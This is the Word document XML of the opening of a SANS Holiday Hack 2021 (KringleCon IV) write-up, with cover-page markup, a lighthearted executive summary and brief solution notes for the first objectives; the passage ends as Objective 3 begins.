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860361413"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Cover Pages"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="4FFEFEBE" w14:textId="7179BA5F" w:rsidR="002950A1" w:rsidRDefault="000B57D0">
          <w:pPr>
            <w:pStyle w:val="NoSpacing"/>
            <w:spacing w:before="1540" w:after="240"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:color w:val="4472C4" w:themeColor="accent1"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4D330193" wp14:editId="3F423BC2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4324350</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1314450" cy="1314450"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="6" name="Graphic 6" descr="A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A snowflak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14450" cy="13144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131401F4" wp14:editId="6918C9D9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-315595</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-414654</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1651012" cy="1651012"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="7" name="Graphic 7" descr="A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A snowflak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rot="20675513">
                          <a:off x="0" y="0"/>
                          <a:ext cx="1651012" cy="1651012"/>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ajorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
              <w:caps/>
              <w:color w:val="4472C4" w:themeColor="accent1"/>
              <w:sz w:val="56"/>
              <w:szCs w:val="56"/>
            </w:rPr>
            <w:alias w:val="Title"/>
            <w:tag w:val=""/>
            <w:id w:val="1735040861"/>
            <w:placeholder>
              <w:docPart w:val="C0F2AAA8A5494F2B9AF997B5C80E5662"/>
            </w:placeholder>
            <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:title[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
            <w:text/>
          </w:sdtPr>
          <w:sdtEndPr/>
          <w:sdtContent>
            <w:p w14:paraId="047F975E" w14:textId="4832ED9A" w:rsidR="002950A1" w:rsidRPr="004F3E9B" w:rsidRDefault="0049132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56"/>
                  <w:szCs w:val="56"/>
                </w:rPr>
                <w:t xml:space="preserve">KRINGLECON Iv: </w:t>
              </w:r>
              <w:r w:rsidR="000B57D0">
                <w:rPr>
                  <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
                  <w:caps/>
                  <w:color w:val="4472C4" w:themeColor="accent1"/>
                  <w:sz w:val="56"/>
                  <w:szCs w:val="56"/>
                </w:rPr>
                <w:t>The fourth one</w:t>
              </w:r>
            </w:p>
          </w:sdtContent>
        </w:sdt>
        <w:p w14:paraId="52417594" w14:textId="124B654B" w:rsidR="002950A1" w:rsidRDefault="004F3E9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6F78B7A" wp14:editId="2C15E7FA">
                    <wp:simplePos x="0" y="0"/>
                    <wp:positionH relativeFrom="margin">
                      <wp:posOffset>-85725</wp:posOffset>
                    </wp:positionH>
                    <wp:positionV relativeFrom="page">
                      <wp:posOffset>3177540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B53BEC5" w14:textId="4653E12E" w:rsidR="002950A1" w:rsidRDefault="00F5283E">
                                    <w:pPr>
                                      <w:pStyle w:val="NoSpacing"/>
                                      <w:spacing w:after="40"/>
                                      <w:jc w:val="center"/>
                                      <w:rPr>
                                        <w:caps/>
                                        <w:color w:val="4472C4" w:themeColor="accent1"/>
                                        <w:sz w:val="28"/>
                                        <w:szCs w:val="28"/>
                                      </w:rPr>
                                    </w:pPr>
                                    <w:r>
                                      <w:rPr>
                                        <w:caps/>
                                        <w:color w:val="4472C4" w:themeColor="accent1"/>
                                        <w:sz w:val="28"/>
                                        <w:szCs w:val="28"/>
                                      </w:rPr>
                                      <w:t>Prepared by Blake Bourgeois</w:t>
                                    </w:r>
                                  </w:p>
                                </w:sdtContent>
                              </w:sdt>
                              <w:p w14:paraId="46CA6867" w14:textId="5AA197DC" w:rsidR="002950A1" w:rsidRDefault="000C252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5283E">
                                      <w:rPr>
                                        <w:caps/>
                                        <w:color w:val="4472C4" w:themeColor="accent1"/>
                                      </w:rPr>
                                      <w:t>SANS holiday hack 2021</w:t>
                                    </w:r>
                                  </w:sdtContent>
                                </w:sdt>
                              </w:p>
                              <w:p w14:paraId="5E141347" w14:textId="676318AC" w:rsidR="002950A1" w:rsidRDefault="000C2525">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5283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6F78B7A" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                    <v:stroke joinstyle="miter"/>
                    <v:path gradientshapeok="t" o:connecttype="rect"/>
                  </v:shapetype>
                  <v:shape id="Text Box 142" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-6.75pt;margin-top:250.2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B53BEC5" w14:textId="4653E12E" w:rsidR="002950A1" w:rsidRDefault="00F5283E">
                              <w:pPr>
                                <w:pStyle w:val="NoSpacing"/>
                                <w:spacing w:after="40"/>
                                <w:jc w:val="center"/>
                                <w:rPr>
                                  <w:caps/>
                                  <w:color w:val="4472C4" w:themeColor="accent1"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:caps/>
                                  <w:color w:val="4472C4" w:themeColor="accent1"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                </w:rPr>
                                <w:t>Prepared by Blake Bourgeois</w:t>
                              </w:r>
                            </w:p>
                          </w:sdtContent>
                        </w:sdt>
                        <w:p w14:paraId="46CA6867" w14:textId="5AA197DC" w:rsidR="002950A1" w:rsidRDefault="00C2553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5283E">
                                <w:rPr>
                                  <w:caps/>
                                  <w:color w:val="4472C4" w:themeColor="accent1"/>
                                </w:rPr>
                                <w:t>SANS holiday hack 2021</w:t>
                              </w:r>
                            </w:sdtContent>
                          </w:sdt>
                        </w:p>
                        <w:p w14:paraId="5E141347" w14:textId="676318AC" w:rsidR="002950A1" w:rsidRDefault="00C2553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5283E">
                                <w:rPr>
                                  <w:color w:val="4472C4" w:themeColor="accent1"/>
                                </w:rPr>
                                <w:t xml:space="preserve">     </w:t>
                              </w:r>
                            </w:sdtContent>
                          </w:sdt>
                        </w:p>
                      </w:txbxContent>
                    </v:textbox>
                    <w10:wrap anchorx="margin" anchory="page"/>
                  </v:shape>
                </w:pict>
              </mc:Fallback>
            </mc:AlternateContent>
          </w:r>
        </w:p>
        <w:p w14:paraId="560568CB" w14:textId="0840D982" w:rsidR="00853B73" w:rsidRDefault="000B57D0">
          <w:r>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2A96678F" wp14:editId="79C24084">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-847725</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1932940</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5943600" cy="3293110"/>
                <wp:effectExtent l="95250" t="0" r="76200" b="154940"/>
                <wp:wrapNone/>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rot="21419011">
                          <a:off x="0" y="0"/>
                          <a:ext cx="5943600" cy="3293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6D1BFB3F" wp14:editId="47A27FAA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>149167</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>35348</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1687169" cy="1687169"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="2" name="Graphic 2" descr="A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A snowflak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rot="828228">
                          <a:off x="0" y="0"/>
                          <a:ext cx="1693115" cy="16931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1A042462" wp14:editId="129F6868">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3790950</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>847090</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2676525" cy="2676525"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1" name="Graphic 1" descr="A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A snowflak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676525" cy="2676525"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
                <wp14:sizeRelH relativeFrom="page">
                  <wp14:pctWidth>0</wp14:pctWidth>
                </wp14:sizeRelH>
                <wp14:sizeRelV relativeFrom="page">
                  <wp14:pctHeight>0</wp14:pctHeight>
                </wp14:sizeRelV>
              </wp:anchor>
            </w:drawing>
          </w:r>
          <w:r w:rsidR="00F5283E">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <mc:AlternateContent>
              <mc:Choice Requires="wps">
                <w:drawing>
                  <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658239" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4DB184C4" wp14:editId="08B57839">
                    <wp:simplePos x="0" y="0"/>
                    <wp:positionH relativeFrom="column">
                      <wp:posOffset>-4422775</wp:posOffset>
                    </wp:positionH>
                    <wp:positionV relativeFrom="paragraph">
                      <wp:posOffset>1606551</wp:posOffset>
                    </wp:positionV>
                    <wp:extent cx="12356200" cy="6382535"/>
                    <wp:effectExtent l="781050" t="0" r="750570" b="2037715"/>
                    <wp:wrapNone/>
                    <wp:docPr id="5" name="Right Triangle 5"/>
                    <wp:cNvGraphicFramePr/>
                    <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                      <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                        <wps:wsp>
                          <wps:cNvSpPr/>
                          <wps:spPr>
                            <a:xfrm rot="1270195" flipH="1">
                              <a:off x="0" y="0"/>
                              <a:ext cx="12356200" cy="6382535"/>
                            </a:xfrm>
                            <a:prstGeom prst="rtTriangle">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E924FE" id="_x0000_t6" coordsize="21600,21600" o:spt="6" path="m,l,21600r21600,xe">
                    <v:stroke joinstyle="miter"/>
                    <v:path gradientshapeok="t" o:connecttype="custom" o:connectlocs="0,0;0,10800;0,21600;10800,21600;21600,21600;10800,10800" textboxrect="1800,12600,12600,19800"/>
                  </v:shapetype>
                  <v:shape id="Right Triangle 5" o:spid="_x0000_s1026" type="#_x0000_t6" style="position:absolute;margin-left:-348.25pt;margin-top:126.5pt;width:972.95pt;height:502.55pt;rotation:-1387392fd;flip:x;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" fillcolor="#acb9ca [1311]" strokecolor="#1f3763 [1604]" strokeweight="1pt"/>
                </w:pict>
              </mc:Fallback>
            </mc:AlternateContent>
          </w:r>
          <w:r w:rsidR="002950A1">
            <w:br w:type="page"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="3EEAC93A" w14:textId="10EF0150" w:rsidR="00853B73" w:rsidRDefault="00853B73" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0618F7" w14:textId="77777777" w:rsidR="00DC1295" w:rsidRDefault="00DC1295">
      <w:r>
        <w:t xml:space="preserve">This year, visitors to the North Pole were greeted by the familiar </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>KringleCon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and a newcomer next door—</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FrostFest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7E429B" w14:textId="19F96B77" w:rsidR="00DC1295" w:rsidRDefault="00DC1295">
      <w:r>
        <w:t xml:space="preserve">Participants were once again caught in the battle between </w:t>
      </w:r>
      <w:r w:rsidR="00D6316D">
        <w:t xml:space="preserve">having a </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">normal </w:t>
      </w:r>
      <w:r w:rsidR="00D6316D">
        <w:t>Christmas</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and Jack Frost’s endless ambition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DDA18C" w14:textId="45E24451" w:rsidR="00DC1295" w:rsidRDefault="00DC1295">
      <w:r>
        <w:t xml:space="preserve">Looking back—Kringle Castle and its staff should be absolutely proud of themselves. While there were certainly issues in their environment, clearly, improvements have been implemented with all the expertise gained over the last few years. Kringle Castle and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>KringleCon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> are bringing in top talent, and I think it shows. Even with the enemy up close and personal right next door, Kringle Castle largely stood up against the threat without </w:t>
      </w:r>
      <w:r w:rsidRPr="00D6316D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>major</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> incident. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3887B077" w14:textId="5393AFB1" w:rsidR="00DC1295" w:rsidRDefault="00DC1295">
      <w:r>
        <w:t xml:space="preserve">On the other hand, Jack Frost’s campaign to “move fast and break things” clearly showed signs of immature </w:t>
      </w:r>
      <w:r w:rsidR="00D6316D">
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> rushed development practices, leaving their environment very vulnerable. Indeed, the attackers had become the attacked. From everything to faulty slot machines with devastating payouts, exposure of sensitive information</w:t>
      </w:r>
      <w:r w:rsidR="00D6316D">
        <w:t xml:space="preserve"> (maybe don’t connect your master plan to the Internet!)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and even digital attacks that affected the physical environment, Jack’s Tower was a security nightmare. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77419342" w14:textId="5713C561" w:rsidR="00DC1295" w:rsidRDefault="00DC1295">
      <w:r>
        <w:t>Skilled analysts at Kringle Castle still have much to review</w:t>
      </w:r>
      <w:r w:rsidR="00D6316D">
        <w:t xml:space="preserve"> as the con dies down</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Their environment suffered several breaches via USB Rubber Duckies, exposed credentials (but still avoided a domain takeover!), </w:t>
      </w:r>
      <w:r w:rsidR="00D6316D">
        <w:t xml:space="preserve">workstation compromise and data exfiltration, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and the loss of digital equipment with potentially sensitive devices in storage. </w:t>
      </w:r>
      <w:r w:rsidR="00D6316D">
        <w:t>There are ways to address all of these things and make Kringle Castle more ready for the next attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBCE120" w14:textId="77777777" w:rsidR="00D6316D" w:rsidRDefault="00DC1295">
      <w:r>
        <w:t>We can only hope that next year, there is no Jack Frost (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6316D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">and no </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D6316D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Spectre</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D6316D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">/Meltdown, and no </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D6316D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Solarwinds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D6316D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>, and no log4j, and no…</w:t>
      </w:r>
      <w:r>
        <w:t>) around to ruin</w:t>
      </w:r>
      <w:r w:rsidR="00D6316D">
        <w:t xml:space="preserve"> holiday</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> festivities. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A86A4B3" w14:textId="7419185E" w:rsidR="00305120" w:rsidRDefault="00DC1295">
      <w:r>
        <w:t>There is a great concentration of talent at the North Pole already between the Elves and Trolls</w:t>
      </w:r>
      <w:r w:rsidR="00D6316D">
        <w:t xml:space="preserve"> to build on, for a better North Pole and better information security community</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9297E7" w14:textId="1736A75F" w:rsidR="00305120" w:rsidRDefault="00305120">
      <w:r>
        <w:t>Surely, now more than ever:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C122178" w14:textId="54DA34A3" w:rsidR="00853B73" w:rsidRDefault="00305120" w:rsidP="00305120">
      <w:pPr>
        <w:pStyle w:val="IntenseQuote"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00284E5F">
        <w:t xml:space="preserve">Secret to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00284E5F">
        <w:t>KringleCon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00284E5F">
        <w:t xml:space="preserve"> success: all of our speakers and organizers, providing the gift of </w:t>
      </w:r>
      <w:r w:rsidRPr="00284E5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cyber security</w:t>
      </w:r>
      <w:r w:rsidRPr="00284E5F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00284E5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>knowledge</w:t>
      </w:r>
      <w:r w:rsidRPr="00284E5F">
        <w:t>, free to the community.</w:t>
      </w:r>
      <w:r w:rsidR="00853B73">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="286A4BE9" w14:textId="64C96D33" w:rsidR="00853B73" w:rsidRPr="00D6316D" w:rsidRDefault="00853B73" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00D6316D">
        <w:lastRenderedPageBreak/>
        <w:t>Objectives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F7EB12" w14:textId="4BE045AF" w:rsidR="00853B73" w:rsidRPr="00D6316D" w:rsidRDefault="00853B73" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00D6316D">
        <w:t xml:space="preserve">Objective 1 – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D6316D">
        <w:t>KringleCon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D6316D">
        <w:t xml:space="preserve"> Orientation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFDC472" w14:textId="02654F7E" w:rsidR="00853B73" w:rsidRDefault="0044142F">
      <w:r>
        <w:t>There are no challenge specific solutions for this objective.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A04B123" w14:textId="1CEC2F46" w:rsidR="0044142F" w:rsidRDefault="0044142F">
      <w:r>
        <w:t xml:space="preserve">The goal is only to retrieve this year’s badge and the USB </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WiFi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Dongle for later use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F8B609" w14:textId="095C54F0" w:rsidR="0044142F" w:rsidRDefault="0044142F">
      <w:r>
        <w:t xml:space="preserve">With both items in hand, we are free to continue into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>KringleCon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 2021. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768200FC" w14:textId="363323BA" w:rsidR="00853B73" w:rsidRDefault="00853B73" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Objective 2 – Where in the World is Caramel </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Santaigo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EE544F" w14:textId="0E472ACB" w:rsidR="0044142F" w:rsidRDefault="0044142F" w:rsidP="0044142F">
      <w:r>
        <w:t xml:space="preserve">In this objective, we are asked to help Tangle </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Coalbox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to find </w:t>
      </w:r>
      <w:r w:rsidR="0094724D">
        <w:t xml:space="preserve">an </w:t>
      </w:r>
      <w:r>
        <w:t>elf.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C475D45" w14:textId="06DD9A9E" w:rsidR="0044142F" w:rsidRDefault="0044142F" w:rsidP="0044142F">
      <w:r>
        <w:t>The premise of the game is simple: review the given clues, narrow down a list of elves, and accurately follow them across the world.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E816574" w14:textId="60FB4FE8" w:rsidR="0044142F" w:rsidRDefault="0044142F" w:rsidP="0044142F">
      <w:r>
        <w:t xml:space="preserve">Each stage presents three hints. </w:t>
      </w:r>
      <w:r w:rsidR="00E317A8">
        <w:t>The hints tend to follow a specific format:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24356AAC" w14:textId="64A9F6D1" w:rsidR="00E317A8" w:rsidRPr="0094724D" w:rsidRDefault="00E317A8" w:rsidP="00E317A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Destination attributes (culture, </w:t>
      </w:r>
      <w:r w:rsidR="00570253" w:rsidRPr="0094724D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>holiday</w:t>
      </w:r>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514E5C2B" w14:textId="7819A97A" w:rsidR="00E317A8" w:rsidRDefault="00E317A8" w:rsidP="00E317A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>To solve, look for key words (Ex. Hogmanay leads to Scotland)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3D4087" w14:textId="0B87B3AC" w:rsidR="00E317A8" w:rsidRPr="0094724D" w:rsidRDefault="00E317A8" w:rsidP="00E317A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Destination technical attributes (IP ranges, photo metadata)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700474D2" w14:textId="5E7499C5" w:rsidR="00E317A8" w:rsidRDefault="00E317A8" w:rsidP="00E317A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To solve, use online IP address registries or other resources to narrow down the location referenced. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3BF6CE" w14:textId="1D8584D4" w:rsidR="00E317A8" w:rsidRDefault="00E317A8" w:rsidP="00E317A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>When provided an image, download the image and use an EXIF data viewing tool to retrieve the location metadata from the photo. Use online mapping services to tie the coordinates to a location.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091AA0B8" w14:textId="26457A35" w:rsidR="00E317A8" w:rsidRPr="0094724D" w:rsidRDefault="00E317A8" w:rsidP="00E317A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0094724D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Elf attributes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E68ED99" w14:textId="42457539" w:rsidR="00570253" w:rsidRDefault="00E317A8" w:rsidP="00570253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">After each encounter, input the discovered elf attributes. Hints provide information on </w:t>
      </w:r>
      <w:r w:rsidR="00570253">
        <w:t>coding languages</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> spoken, preferred social medium, preferred indentation stye, fandom, and “GIF” pronunciation. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F558A9" w14:textId="2AA96D7C" w:rsidR="00853B73" w:rsidRDefault="00570253">
      <w:r>
        <w:t xml:space="preserve">After three stages, you will eventually catch up to the elf during investigation: if the correct entries were put into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Interrink</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, there should be a single candidate elf.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AB497F" w14:textId="76517E9A" w:rsidR="00853B73" w:rsidRDefault="00853B73" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Objective 3 – Thaw Frost Tower’s Entrance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414EEDD4" w14:textId="11AD2975" w:rsidR="00853B73" w:rsidRDefault="00A82F86">
      <w:r>
        <w:t xml:space="preserve">Grimy </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>McTrollkins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> outside of Frost Tower is having difficulty entering the building and shares information regarding a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WiFi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> thermostat that is just visible in the nearby window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1C380F" w14:textId="676B1BC2" w:rsidR="00A82F86" w:rsidRDefault="00A82F86">
